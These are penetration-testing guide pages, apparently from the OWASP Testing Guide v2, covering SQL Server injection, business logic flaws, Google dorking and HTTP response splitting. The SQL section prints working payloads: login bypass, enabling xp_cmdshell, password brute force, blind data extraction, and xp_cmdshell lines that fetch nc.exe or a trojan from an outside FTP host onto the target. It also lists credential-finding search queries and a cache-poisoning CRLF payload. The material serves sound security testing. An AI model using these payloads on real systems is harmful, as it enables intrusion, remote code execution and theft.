Information gathering is useful for exploiting software vulnerabilities at the SQL Server, through the exploitation of a SQL-injection attack or direct access to the SQL listener.

There follow several examples that exploit SQL injection vulnerabilities through different entry points.

===Example 1: Testing for SQL Injection in a GET request. ===

The most simple (and sometimes rewarding) case would be that of a login page requesting an user name and password for user login. You can try entering the following string "' or '1'='1" (without double quotes):

<nowiki>https://vulnerable.web.app/login.asp?Username='%20or%20'1'='1&Password='%20or%20'1'='1</nowiki>

If the application is using Dynamic SQL queries, and the string gets appended to the user credentials validation query, this may result in a successful login to the application.

===Example 2: Testing for SQL Injection in a GET request (2).===

In order to learn how many columns there exist

<nowiki>https://vulnerable.web.app/list_report.aspx?number=001%20UNION%20ALL%201,1,'a',1,1,1%20FROM%20users;--</nowiki>

===Example 3: Testing in a POST request ===

SQL Injection, HTTP POST Content: email=%27&whichSubmit=submit&submit.x=0&submit.y=0

A complete post example:

POST <nowiki>https://vulnerable.web.app/forgotpass.asp HTTP/1.1</nowiki>
Host: vulnerable.web.app
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Paros/3.2.13
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: <nowiki>http://vulnerable.web.app/forgotpass.asp</nowiki>
Content-Type: application/x-www-form-urlencoded
Content-Length: 50 
email=%27&whichSubmit=submit&submit.x=0&submit.y=0

The error message obtained when a ' (single quote) character is entered at the email field is:

Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string '' '.
/forgotpass.asp, line 15

===Example 4: Yet another (useful) GET example===

Obtaining the application's source code

a' ; master.dbo.xp_cmdshell ' copy c:\inetpub\wwwroot\login.aspx c:\inetpub\wwwroot\login.txt';--

===Example 5: custom xp_cmdshell===

All books and papers describing the security best practices for SQL Server recommend to disable xp_cmdshell in SQL Server 2000 (in SQL Server 2005 it is disabled by default). However, if we have sysadmin rights (natively or by bruteforcing the sysadmin password, see below), we can often bypass this limitation.
 
On SQL Server 2000:
* If xp_cmdshell has been disabled with sp_dropextendedproc, we can simply inject the following code:
<pre>
sp_addextendedproc 'xp_cmdshell','xp_log70.dll'
</pre>
* If the previous code does not work, it means that the xp_log70.dll has been moved or deleted. In this case we need to inject the following code:
<pre>
CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS
DECLARE @result int, @OLEResult int, @RunResult int
DECLARE @ShellID int
EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult)
EXECUTE @OLEResult = sp_OAMethod @ShellID, 'Run', Null, @cmd, 0, @Wait
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('Run %0X', 14, 1, @OLEResult)
EXECUTE @OLEResult = sp_OADestroy @ShellID
return @result
</pre>
This code, written by Antonin Foller (see links at the bottom of the page), creates a new xp_cmdshell using sp_oacreate, sp_method and sp_destroy (as long as they haven't been disabled too, of course). Before using it, we need to delete the first xp_cmdshell we created (even if it was not working), otherwise the two declarations will collide.
 
On SQL Server 2005, xp_cmdshell can be enabled injecting the following code instead:
<pre>
master..sp_configure 'show advanced options',1
reconfigure
master..sp_configure 'xp_cmdshell',1
reconfigure
</pre>

===Example 6: Referer / User-Agent===

The REFERER header set to:

Referer: <nowiki>https://vulnerable.web.app/login.aspx', 'user_agent', 'some_ip'); [SQL CODE]--</nowiki>

Allows the execution of arbitrary SQL Code. The same happens with the User-Agent header set to:

User-Agent: user_agent', 'some_ip'); [SQL CODE]--

===Example 7: SQL Server as a port scanner===

In SQL Server, one of the most useful (at least for the penetration tester) commands is OPENROWSET, which is used to run a query on another DB Server and retrieve the results. The penetration tester can use this command to scan ports of other machines in the target network, injecting the following query:
<pre>
select * from OPENROWSET('SQLOLEDB','uid=sa;pwd=foobar;Network=DBMSSOCN;Address=x.y.w.z,p;timeout=5','select 1')--
</pre>
This query will attempt a connection to the address x.y.w.z on port p. If the port is closed, the following message will be returned:
<pre>
SQL Server does not exist or access denied
</pre>
On the other hand, if the port is open, one of the following errors will be returned:
<pre>
General network error. Check your network documentation
</pre>
<pre>
OLE DB provider 'sqloledb' reported an error. The provider did not give any information about the error.
</pre>
Of course, the error message is not always available. If that is the case, we can use the response time to understand what is going on: with a closed port, the timeout (5 seconds in this example) will be consumed, whereas an open port will return the result right away.

Keep in mind that OPENROWSET is enabled by default in SQL Server 2000 but disabled in SQL Server 2005.

===Example 8: Upload of executables===

Once we can use xp_cmdshell (either the native one or a custom one), we can easily upload executables on the target DB Server. A very common choice is netcat.exe, but any trojan will be useful here.
If the target is allowed to start FTP connections to the tester's machine, all that is needed is to inject the following queries:
<pre>
exec master..xp_cmdshell 'echo open ftp.tester.org > ftpscript.txt';--
exec master..xp_cmdshell 'echo USER >> ftpscript.txt';--
exec master..xp_cmdshell 'echo PASS >> ftpscript.txt';--
exec master..xp_cmdshell 'echo bin >> ftpscript.txt';--
exec master..xp_cmdshell 'echo get nc.exe >> ftpscript.txt';--
exec master..xp_cmdshell 'echo quit >> ftpscript.txt';--
exec master..xp_cmdshell 'ftp -s:ftpscript.txt';--
</pre>
At this point, nc.exe will be uploaded and available.
 
If FTP is not allowed by the firewall, we have a workaround that exploits the Windows debugger, debug.exe, that is installed by default in all Windows machines. Debug.exe is scriptable and is able to create an executable by executing an appropriate script file. What we need to do is to convert the executable into a debug script (which is a 100% ascii file), upload it line by line and finally call debug.exe on it. There are several tools that create such debug files (e.g.: makescr.exe by Ollie Whitehouse and dbgtool.exe by toolcrypt.org). The queries to inject will therefore be the following:
<pre>
exec master..xp_cmdshell 'echo [debug script line #1 of n] > debugscript.txt';--
exec master..xp_cmdshell 'echo [debug script line #2 of n] >> debugscript.txt';--
....
exec master..xp_cmdshell 'echo [debug script line #n of n] >> debugscript.txt';--
exec master..xp_cmdshell 'debug.exe < debugscript.txt';--
</pre>
At this point, our executable is available on the target machine, ready to be executed.

There are tools that automate this process, most notably Bobcat, which runs on Windows, and Sqlninja, which runs on *nix (See the tools at the bottom of this page).

===Obtain information when it is not displayed (Out of band)===

Not all is lost when the web application does not return any information --such as descriptive error messages (cf. [[http://www.owasp.org/index.php/Blind_SQL_Injection|Blind SQL injection]]). For example, it might happen that one has access to the source code (e.g., because the web application is based on an open source software). Then, the pen tester can exploit all the SQL-injection vulnerabilities discovered offline in the web application. Although an IPS might stop some of these attacks, the best way would be to proceed as follows: develop and test the attacks in a testbed created for that purpose, and then execute these attacks against the web application being tested.

Other options for out of band attacks are described in Sample 4 above.

===Blind SQL injection attacks===

====Trial and error====
Alternatively, one may play lucky. That is the attacker may assume that there is a blind or out-of-band SQL-injection vulnerability in a the web application. He will then select an attack vector (e.g., a web entry), use fuzz vectors ([[http://www.owasp.org/index.php/OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors]]) against this channel and watch the response. For example, if the web application is looking for a book using a query

select * from books where title='''text entered by the user'''

then the penetration tester might enter the text: ''''Bomba' OR 1=1-''' and if data is not properly validated, the query will go through and return the whole list of books. This is evidence that there is a SQL-injection vulnerability. The penetration tester might later ''play'' with the queries in order to assess the criticality of this vulnerability.

====In case more than one error message is displayed====
On the other hand, if no prior information is available there is still a possibility of attacking by exploiting any ''covert channel''. It might happen that descriptive error messages are stopped, yet the error messages give some information. For example:

* On some cases the web application (actually the web server) might return the traditional ''500: Internal Server Error'', say when the application returns an exception that might be generated for instance by a query with unclosed quotes.
* While on other cases the server will return a 200 OK message, but the web application will return some error message inserted by the developers ''Internal server error'' or ''bad data''.

This 1 bit of information might be enough to understand how the dynamic SQL query is constructed by the web application and tune up an exploit.

Another out-of-band method is to output the results through HTTP browseable

====Timing attacks====
There is one more possibility for making a blind SQL-injection attack when there is not visible feedback from the application: by measuring the time that it takes the web application to answer a request. An attack of this sort is described by Anley in ([2]) from where we take the next examples. A typical approach uses the ''waitfor delay'' command: let's say that the attacker wants to check if the 'pubs' sample database exists, he will simply inject the following command:

if exists (select * from pubs..pub_info) waitfor delay '0:0:5'

Depending on the time that the query takes to return, we will know the answer. In fact, what we have here is two things: a '''SQL-injection vulnerability''' and a '''covert channel''' that allows the penetration tester to get 1 bit of information for each query. Hence, using several queries (as much queries as the bits in the required information) the pen tester can get any data that is in the database. Look at the following query

declare @s varchar(8000)
declare @i int
select @s = db_name()
select @i = [some value]
if (select len(@s)) < @i waitfor delay '0:0:5'

Measuring the response time and using different values for @i, we can deduce the length of the name of the current database, and then start to extract the name itself with the following query:

if (ascii(substring(@s, @byte, 1)) & ( power(2, @bit))) > 0 waitfor delay '0:0:5'

This query will wait for 5 seconds if bit '@bit' of byte '@byte' of the name of the current database is 1, and will return at once if it is 0. Nesting two cycles (one for @byte and one for @bit) we will we able to extract the whole piece of information.

However, it might happen that the command ''waitfor'' is not available (e.g., because it is filtered by an IPS/web application firewall). This doesn't mean that blind SQL-injection attacks cannot be done, as the pen tester should only come up with any time consuming operation that is not filtered. For example

declare @i int select @i = 0
while @i < 0xaffff begin
select @i = @i + 1
end

====Checking for version and vulnerabilities====
The same timing approach can be used also to understand which version of SQL Server we are dealing with. Of course we will leverage the built-in @@version variable. Consider the following query:

select @@version

On SQL Server 2005, it will return something like the following:

Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 <snip>

The '2005' part of the string spans from the 22nd to the 25th character. Therefore, one query to inject can be the following:

if substring((select @@version),25,1) = 5 waitfor delay '0:0:5'

Such query will wait 5 seconds if the 25th character of the @@version variable is '5', showing us that we are dealing with a SQL Server 2005. If the query returns immediately, we are probably dealing with SQL Server 2000, and another similar query will help to clear all doubts.

===Example 9: bruteforce of sysadmin password===

To bruteforce the sysadmin password, we can leverage the fact that OPENROWSET needs proper credentials to successfully perform the connection and that such a connection can be also "looped" to the local DB Server.
Combining these features with an inferenced injection based on response timing, we can inject the following code:
<pre>
select * from OPENROWSET('SQLOLEDB','';'sa';'<pwd>','select 1;waitfor delay ''0:0:5'' ')
</pre>
What we do here is to attempt a connection to the local database (specified by the empty field after 'SQLOLEDB') using "sa" and "<pwd>" as credentials. If the password is correct and the connection is successful, the query is executed, making the DB wait for 5 seconds (and also returning a value, since OPENROWSET expects at least one column). Fetching the candidate passwords from a wordlist and measuring the time needed for each connection, we can attempt to guess the correct password. In "Data-mining with SQL Injection and Inference", David Litchfield pushes this technique even further, by injecting a piece of code in order to bruteforce the sysadmin password using the CPU resources of the DB Server itself.
Once we have the sysadmin password, we have two choices:

* Inject all following queries using OPENROWSET, in order to use sysadmin privileges

* Add our current user to the sysadmin group using sp_addsrvrolemember. The current user name can be extracted using inferenced injection against the variable system_user.

Remember that OPENROWSET is accessible to all users on SQL Server 2000 but it is restricted to administrative accounts on SQL Server 2005.

== References ==
'''Whitepapers''' 
* David Litchfield: "Data-mining with SQL Injection and Inference" - http://www.nextgenss.com/research/papers/sqlinference.pdf
* Chris Anley, "(more) Advanced SQL Injection" - http://www.ngssoftware.com/papers/more_advanced_sql_injection.pdf
* Steve Friedl's Unixwiz.net Tech Tips: "SQL Injection Attacks by Example" - http://www.unixwiz.net/techtips/sql-injection.html
* Alexander Chigrik: "Useful undocumented extended stored procedures" - http://www.mssqlcity.com/Articles/Undoc/UndocExtSP.htm
* Antonin Foller: "Custom xp_cmdshell, using shell object" - http://www.motobit.com/tips/detpg_cmdshell
* Paul Litwin: "Stop SQL Injection Attacks Before They Stop You" - http://msdn.microsoft.com/msdnmag/issues/04/09/SQLInjection/
* SQL Injection - http://msdn2.microsoft.com/en-us/library/ms161953.aspx

'''Tools''' 
* Francois Larouche: Multiple DBMS Sql Injection tool - [[http://www.sqlpowerinjector.com/index.htm SQL Power Injector]]
* Northern Monkee: [[http://www.northern-monkee.co.uk/projects/bobcat/bobcat.html Bobcat]]
* icesurfer: SQL Server Takeover Tool - [[http://sqlninja.sourceforge.net sqlninja]]
* Bernardo Damele and Daniele Bellucci: sqlmap, a blind SQL injection tool - http://sqlmap.sourceforge.net

{{Category:OWASP Testing Project AoC}}

Testing for business logic

2007-03-09T16:25:55Z

Icesurfer:

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Brief Summary ==

Business logic comprises:
* Business rules that express business policy (such as channels, location, logistics, prices, and products); and
* Workflows that are the ordered tasks of passing documents or data from one participant (a person or a software system) to another.

The attacks on the business logic of an application are dangerous, difficult to detect and specific to that application.

==Description of the Issue==

Business logic can have security flaws that allow a user to do something that isn't allowed by the business. For example, if there is a limit on reimbursement of $1000, could an attacker misuse the system to request more money than is allowed? Or perhaps you are supposed to do operations in a particular order, but an attacker could invoke them out of sequence. Or can a user make a purchase for a negative amount of money? Frequently these business logic security checks simply are not present in the application.

Automated tools find it hard to understand context, hence it's up to a person to perform these kinds of tests.

'''Business Limits and Restrictions''' 

Consider the rules for the business function being provided by the application. Are there any limits or restrictions on people's behavior? Then consider whether the application enforces those rules. It's generally pretty easy to identify the test and analysis cases to verify the application if you're familiar with the business. If you are a third-party tester, then you're going to have to use your common sense and ask the business if different operations should be allowed by the application.

'''Example''': Setting the quantity of a product on an e-commerce site as a negative number may result in funds being credited to the attacker. The countermeasure to this problem is to implement stronger data validation, as the application permits negative numbers to be entered in the quantity field of the shopping cart.

==Black Box Testing and Examples==

Although uncovering logical vulnerabilities will probably always remain an art, one can attempt to go about it systematically to a great extent. Here is a suggested approach that consists of:
* Understanding the application
* Creating raw data for designing logical tests
* Designing the logical tests
* Standard prerequisites
* Execution of logical tests

===Understanding the application===

Understanding the application thoroughly is a prerequisite for designing logical tests. To start with:
* Get any documentation describing the application's functionality. Examples of this include:
** Application manuals
** Requirements documents
** Functional specifications
** Use or Abuse Cases
* Explore the application manually and try to understand all the different ways in which the application can be used, the acceptable usage scenarios and the authorization limits imposed on various users

===Creating raw data for designing logical tests===

In this phase, one should ideally come up with the following data:
* All application '''business scenarios'''. For example, for an e-commerce application this might look like,
** Product ordering
** Checkout
** Browse
** Search for a product
* '''Workflows'''. This is different from business scenarios since it involves a number of different users. Examples include:
** Order creation and approval
** Bulletin board (one user posts an article that is reviewed by a moderator and ultimately seen by all users)
* Different '''user roles'''
** Administrator
** Manager
** Staff
** CEO
* Different '''groups or departments''' (note that there could be a tree (e.g. the Sales group of the heavy engineering division) or tagged view (e.g. someone could be a member of Sales as well as marketing) associated with this.
** Purchasing
** Marketing
** Engineering
* '''Access rights of various user roles and groups''' - The application allows various users privileges on some resource (or asset) and we need to specify the constraints of these privileges. One simple way to know these business rules/constraints is to make use of the application documentation effectively. For example, look for clauses like "If the administrator allows individual user access..", "If configured by the administrator.." and you know the restriction imposed by the application.
* '''Privilege Table''' – After learning about the various privileges on the resources along with the constraints, you are all set to create a Privilege Table. Get answers to:
** What can each user role do on which resource with what constraint? This will help you in deducing who cannot do what on which resource.
** What are the policies across groups?

Consider the following privileges: "Approve expense report", "Book a conference room", "Transfer money from own account to another user's account". A privilege could be thought of as a combination of a verb (e.g. Approve, Book, Withdraw) and one or more nouns (Expense report, conference room, account). The output of this activity is a grid with the various privileges forming the leftmost column while all user roles and groups would form the column headings of other columns. There would also be a “Comments” column that qualifies data in this grid.

<blockquote style="background: white; border: 1px solid rgb(153, 153, 153); padding: 1em;">
{| class="wikitable" style="margin: 1em auto 1em auto"
| '''Privilege''' || '''Who can do this''' || '''Comment'''
|-
| Approve expense report || Any supervisor may approve report submitted by his subordinate ||
|-
| Submit expense report || Any employee may do this for himself ||
|-
| Transfer funds from one account to another || An account holder may transfer funds from own account to another account ||
|-
| View payslip || Any employee may see his own ||
|-
|}
</blockquote>

This data is a key input for designing logical tests.

===Developing logical tests===

Here are several guidelines to designing logical tests from the raw data gathered.

* '''Privilege Table''' - Make use of the privilege table as a reference while creating application specific logical threats. In general, develop a test for each admin privilege to check if it could be executed illegally by a user role with minimum privileges or no privilege. For example:
** Privilege: Operations Manager cannot approve a customer order
** Logical Test: Operations Manager approves a customer order

* '''Improper handling of special user action sequences''' - Navigating through an application in a certain way or revisiting pages out of synch can cause logical errors which may cause the application to do something it's not meant to. For example:
** A wizard application where one fills in forms and proceeds to the next step. One cannot in any normal way (according to the developers) enter the wizard in the middle of the process. Bookmarking a middle step (say step 4 of 7), then continuing with the other steps until completion or form submission, then revisiting the middle step that was bookmarked may "upset" the backend logic due to a weak ''state model''.

* '''Cover all business transaction paths''' - While designing tests, check for all alternative ways to perform the same business transaction. For example, create tests for both cash and credit payment modes.

* '''Client-side validation''' - Look at all client side validations and see how they could be the basis for designing logical tests. For example, a funds transfer transaction has a validation for negative values in the amount field. This information can be used to design a logical test such as "A user transfers negative amount of money".

===Standard prerequisites===

Typically, some initial activities useful as setup are:
* Create test users with different permissions
* Browse all the important business scenarios/workflows in the application

===Execution of logical tests===

Pick up each logical test and do the following:
* Analyze the HTTP/S requests underlying the acceptable usage scenario corresponding to the logical test
** Check the order of HTTP/S requests
** Understand the purpose of hidden fields, form fields, query string parameters being passed
* Try and subvert it by exploiting the known vulnerabilities
* Verify that the application fails for the test

===A real world example===

In order to provide the reader with a better understanding of this issue and how to test it, we describe a real world case that was investigated by one of the authors in 2006.
At that time, a mobile telecom operator (we'll call it FlawedPhone.com) launched a webmail+SMS service for its customers, with the following characteristics:

* New customers, when buying a SIM card, can open a free, permanent email account with the flawedphone.com domain
* The email is preserved even if the customers “transfers” the SIM card to another telecom operator
* However, as long as the SIM card is registered to FlawedPhone, each time an email is received, a SMS message is sent to the customer, including sender and subject
* The SMS application checks that the target phone number is a legitimate customer from its own copy of the FlawedPhone customers list, which is automatically updated every ~8 hours.

The application had been developed following security best practices but it suffered from a business logic flaw and FlawedPhone was soon targeted by the following fraud attack:

* The attacker bought a new FlawedPhone SIM card
* The attacker immediately requested to transfer the SIM card to another mobile carrier, which credits 0.05 € for each received SMS message
* As soon as the SIM card was “transferred” to the new provider, the attacker started sending hundreds of emails to her FlawedPhone email account
* The attacker had a ~8 hours window before the email+SMS application had its list updated and stopped delivering messages
* By that time, the attacker had ~50-100 € in the card, and proceeded to sell it on eBay

The developers thought that SMS messages delivered during the 8 hours period would have introduced a negligible cost but failed to consider the likelihood of an automated attack like the one described.
As we can see, the synchronization time, combined with the lack of a limit to the number of messages that could be delivered in a given period of time, introduced a critical flaw in the system that was soon exploited by malicious users.

==References==
'''Whitepapers''' 
* Business logic - http://en.wikipedia.org/wiki/Business_logic
* Prevent application logic attacks with sound app security practices - http://searchappsecurity.techtarget.com/qna/0,289202,sid92_gci1213424,00.html?bucket=NEWS&topic=302570 

'''Tools''' 

Automated tools are incapable of detecting logical vulnerabilities. For example, tools have no means of detecting if a bank’s "fund transfer" page allows a user to transfer a negative amount to another user (in other words, it allows a user to transfer a positive amount into his own account) nor do they have any mechanism to help the human testers to suspect this state of affairs.

'''Preventing transfer of a negative amount''': Tools could be enhanced so that they can report client side validations to the tester. For example, the tool may have a feature whereby it fills a form with strange values and attempts to submit it using a full-fledged browser implementation. It should check to see whether the browser actually submitted the request. Detecting that the browser has not submitted the request would signal to the tool that submitted values are not being accepted due to client-side validation. This would be reported to the tester, who would then understand the need for designing appropriate logical tests that bypass client-side validation. In our "negative amount transfer" example, the tester would learn that the transfer of negative amounts may be an interesting test. He could then design a test wherein the tool bypasses the client-side validation code and checks to see if the resulting response contains the string "funds transfer successful". The point is not that the tool will be able to detect this or other vulnerabilities of this nature, rather that, with some thought, it would be possible to add many such features to enlist the tools in aiding human testers to find such logical vulnerabilities.

 
{{Category:OWASP Testing Project AoC}}

Testing: Spidering and googling

2007-02-22T23:10:36Z

Icesurfer: /* References */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Brief Summary ==

This section describes how to retrieve information about the application being tested using spidering and googling techniques.

== Description of the Issue ==

Web spiders are the most powerful and useful tools developed for both good and bad intentions on the internet. A spider serves one major function, Data Mining. The way a typical spider (like Google) works is by crawling a web site one page at a time, gathering and storing the relevant information such as email addresses, meta-tags, hidden form data, URL information, links, etc. The spider then crawls all the links in that page, collecting relevant information in each following page, and so on. Before you know it, the spider has crawled thousands of links and pages gathering bits of information and storing it into a database. This web of paths is where the term 'spider' is derived from.

The Google search engine found at http://www.google.com offers many features, including language and document translation; web, image, newsgroups, catalog, and news searches; and more. These features offer obvious benefits to even the most uninitiated web surfer, but these same features offer far more nefarious possibilities to the most malicious Internet users, including hackers, computer criminals, identity thieves, and even terrorists. This article outlines the more harmful applications of the Google search engine, techniques that have collectively been termed "Google Hacking."
In 1992, there were about 15,000 web sites, in 2006 the number has exceeded 100 million. What if a simple query to a search engine like Google such as "Hackable Websites w/ Credit Card Information" produced a list of websites that contained customer credit card data of thousands of customers per company?
If the attacker is aware of a web application that stores a clear text password file in a directory and wants to gather these targets, then he could search on "intitle:"Index of" .mysql_history" and the search engine will provide him with a list of target systems that may divulge these database usernames and passwords (out of a possible 100 million web sites available). Or perhaps the attacker has a new method to attack a Lotus Notes web server and simply wants to see how many targets are on the internet, he could search on "inurl:domcfg.nsf". Apply the same logic to a worm looking for its new victim.

== Black Box testing and example ==

===Spidering===

'''Description and goal'''

Our goal is to create a map of the application with all the points of access (gates) to the application.
This will be useful for the second active phase of penetration testing.
You can use a tool such as wget (powerful and very easy to use) to retrieve all the information published by the application.

'''Test:'''

The -s option is used to collect the HTTP header of the web requests.

<pre>
wget -s <target>
</pre>

'''Result:'''

<pre>
HTTP/1.1 200 OK
Date: Tue, 12 Dec 2006 20:46:39 GMT
Server: Apache/1.3.37 (Unix) mod_jk/1.2.8 mod_deflate/1.0.21 PHP/5.1.6 mod_auth_
passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.26
34a mod_ssl/2.8.28 OpenSSL/0.9.7a
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=b7f5c903f8fdc254ccda8dc33651061f; expires=Friday, 05-Jan-0
7 00:19:59 GMT; path=/
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 12 Dec 2006 20:46:39 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
</pre>

'''Test:'''

The -r option is used to collect recursively the web-site's content and the -D option restricts the request only for the specified domain.

<pre>
wget -r -D <domain> <target>
</pre>

'''Result:'''

<pre>
22:13:55 (15.73 KB/s) - `www.******.org/indice/13' saved [8379]

--22:13:55-- http://www.******.org/*****/********
=> `www.******.org/*****/********'
Connecting to www.******.org[xx.xxx.xxx.xx]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]

[ <=> ] 11,308 17.72K/s

...
</pre>

===Googling===

'''Description and goal'''

The scope of this activity is to find information about a single web site published on the internet or to find a specific kind of application such as Webmin or VNC.
There are tools available that can assist with this technique, for example googlegath, but it is also possibile to perform this operation manually using Google's web site search facilities. This operation does not require specialist technical skills and is a good way to collect information about a web target.

'''Useful Google Advanced Search techniques '''

* Use the plus sign (+) to force a search for an overly common word. Use the minus sign (-) to exclude a term from a search. No spaces follow these signs.
* To search for a phrase, supply the phrase surrounded by double quotes (" ").
* A period (.) serves as a single-character wildcard.
* An asterisk (*) represents any word —- not the completion of a word, as is traditionally used.

Google advanced operators help refine searches. Advanced operators use the following syntax: operator:search_term . Notice that there is no space between the operator, the colon, and the search term. A list of operators and search terms follows:
* The ''site'' operator instructs Google to restrict a search to a specific web site or domain. The web site to search must be supplied after the colon.
* The ''filetype'' operator instructs Google to search only within the text of a particular type of file. The file type to search must be supplied after the colon. Don't include a period before the file extension.
* The ''link'' operator instructs Google to search within hyperlinks for a search term.
* The ''cache'' operator displays the version of a web page as it appeared when Google crawled the site. The URL of the site must be supplied after the colon.
* The ''intitle'' operator instructs Google to search for a term within the title of a document.
* The ''inurl'' operator instructs Google to search only within the URL (web address) of a document. The search term must follow the colon.

The following are a set googling examples (for a complete list look at [1]):

'''Test:'''

<pre>
site:www.xxxxx.ca AND intitle:"index.of" "backup"
</pre>

'''Result:'''

The operator site: restricts a search in a specific domain, while the intitle: operator makes it possibile to find the pages that contain "index of backup" as a link title of the Google output. 
The AND boolean operator is used to combine more conditions in the same query.

<pre>
Index of /backup/

Name Last modified Size Description

Parent Directory 21-Jul-2004 17:48 -
</pre>

'''Test:'''

<pre>
"Login to Webmin" inurl:10000
</pre>

'''Result:'''

The query produces an output with every Webmin authentication interface collected by Google during the spidering process.

'''Test:'''

<pre>
site:www.xxxx.org AND filetype:wsdl wsdl
</pre>

'''Result:'''

The filetype operator is used to find specific kind of files on the web-site.

'''Using a search engine to discover virtual hosts'''

Live.com, another well-known search engine (see link at the bottom of the page), provides the "ip" operator, which returns all the pages that are known to belong to a certain IP address. This is a very useful technique to find out which virtual hosts are configured on the tested server. For instance, the following query will return all indexed pages belonging to the domain owasp.org:
<pre>
ip:216.48.3.18
</pre>

== References ==
'''Whitepapers''' 
* [1] Johnny Long: "Google Hacking" - http://johnny.ihackstuff.com

'''Tools''' 
* Google – http://www.google.com 
* Live Search - http://www.live.com
* wget - http://www.gnu.org/software/wget/
* Foundstone SiteDigger - http://www.foundstone.com/index.htm?subnav=resources/navigation.htm&subcontent=/resources/proddesc/sitedigger.htm
* NTOInsight - http://www.ntobjectives.com/freeware/index.php 
* Burp Spider - http://portswigger.net/spider/ 
* Wikto - http://www.sensepost.com/research/wikto/ 
* Googlegath - http://www.nothink.org/perl/googlegath/ 
* Advanced Dork (Firefox Add-on) - https://addons.mozilla.org/firefox/2144/

{{Category:OWASP Testing Project AoC}}

2006-12-04T23:20:56Z

Icesurfer:

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Brief Summary ==
In this chapter we will illustrate examples of attacks that leverage specific features of the HTTP protocol, either by exploiting weaknesses of the web application or peculiarities in the way different agents interpret HTTP messages
 

== Description of the Issue ==
We will analyze two different attacks that target specific HTTP headers: HTTP splitting and HTTP smuggling. The first attack exploits a lack of input sanitization which allows an intruder to insert CR and LF characters into the headers of the application response and to 'split' that answer into two different HTTP messages. The goal of the attack can vary from a cache poisoning to cross site scripting. In the second attack, the attacker exploits the fact that some specially crafted HTTP messaged can be parsed and interpreted in different ways depending on the agent that receives them. HTTP smuggling requires some level of knowledge about the different agents that are handling the HTTP messages (web server, proxy, firewall) and therefore will be included only in the Gray Box testing section 

== Black Box testing and Examples ==
===HTTP Splitting===
Some web applications use part of the user input to generate the values of some headers of their responses. The most straightforward example is provided by redirections in which the target URL depends on some user submitted value. Let's say for instance that the user is asked to choose whether he/she prefers a standard or advanced web interface. Such choice will be passed as a parameter that will be used in the response header to trigger the redirection to the corrisponding page. More specifically, if the parameter 'interface' has the value 'advanced', the application will answer with the following:
<pre>
HTTP/1.1 302 Moved Temporarily
Date: Sun, 03 Dec 2005 16:22:19 GMT
Location: http://victim.com/main.jsp?interface=advanced
<snip>
</pre>
When receiving this message, the browser will bring the user to the page indicated in the Location header. However, if the application does not filter the user input, it will be possible to insert in the 'interface' parameter the sequence %0d%0a, which represent the CRLF sequence that is used to separate different lines. At this point, we will be able to trigger a response that will be interpreted as two different responses by anybody who happens to parse it, for instance a web cache sitting between us and the application. This can be leveraged by an attacker to poison this web cache so that it will provide false content in all subsequent requests. Let's say that in our previous example the pen-tester passes the following data as the interface parameter:
<pre>
advanced%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-
Type:%20text/html%0d%0aContent-Length:%2035%0d%0a%0d%0a<html>Sorry,%20System%20Down</html>
</pre>
The resulting answer from the vulnerable application will therefore be the
following:
<pre>
HTTP/1.1 302 Moved Temporarily
Date: Sun, 03 Dec 2005 16:22:19 GMT
Location: http://victim.com/main.jsp?interface=advanced
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 35

<html>Sorry,%20System%20Down</html>
<other data>
</pre>
The web cache will see two different responses, so if the attacker sends, immediately after the first request. a
second one asking for /index.html, the web cache will match this request with the second response and cache its content, so that all subsequent requests directed to victim.com/index.html passing through that web cache
will receive the "system down" message. In this way, an attacker would be able to effectively deface the site for all users using that web cache (the whole Internet, if the web cache is a reverse proxy for the web application). Alternatively, the attacker could pass to those users a JavaScript snippet that would steal their cookies, mounting a Cross Site Scripting attack. Note that while the vulnerability is in the application, the target here are its users.

Therefore, in order to look for this vulnerability, the tester needs to identify all user controlled input that influences one or more headers in the response, and check whether he/she can successfully inject a CR+LF sequence in it. The headers that are the most likely candidates for this attack are:

* Location
* Set-Cookie

It must be noted that a successful exploitation of this vulnerability in a real world scenario can be quite complex, as several factors must be taken into account:

# The pen-tester must properly set the headers in the fake response for it to be successfully cached (e.g.: a Last-Modified header with a date set in the future). He/she might also have to destroy previously cached versions of the target pagers, by issuing a preliminary request with "Pragma: no-cache" in the request headers
# The application, while not filtering the CR+LF sequence, might filter other characters that are needed for a successful attack (e.g.: "<" and ">"). In this case, the tester can try to use other encodings (e.g.: UTF-7)
# Some targets (e.g.: ASP) will URL-encode the path (e.g.: www.victim.com/redirect.asp) part of the Location header, making a CRLF sequence useless. However, they fail to encode the query section (e.g.: ?interface=advanced), meaning that a leading question mark is enough to bypass this problem

For a more detailed discussion about this attack and other information about possible scenarios and applications, check the corresponding paper referenced at the bottom of this page
 
== Gray Box testing and example ==
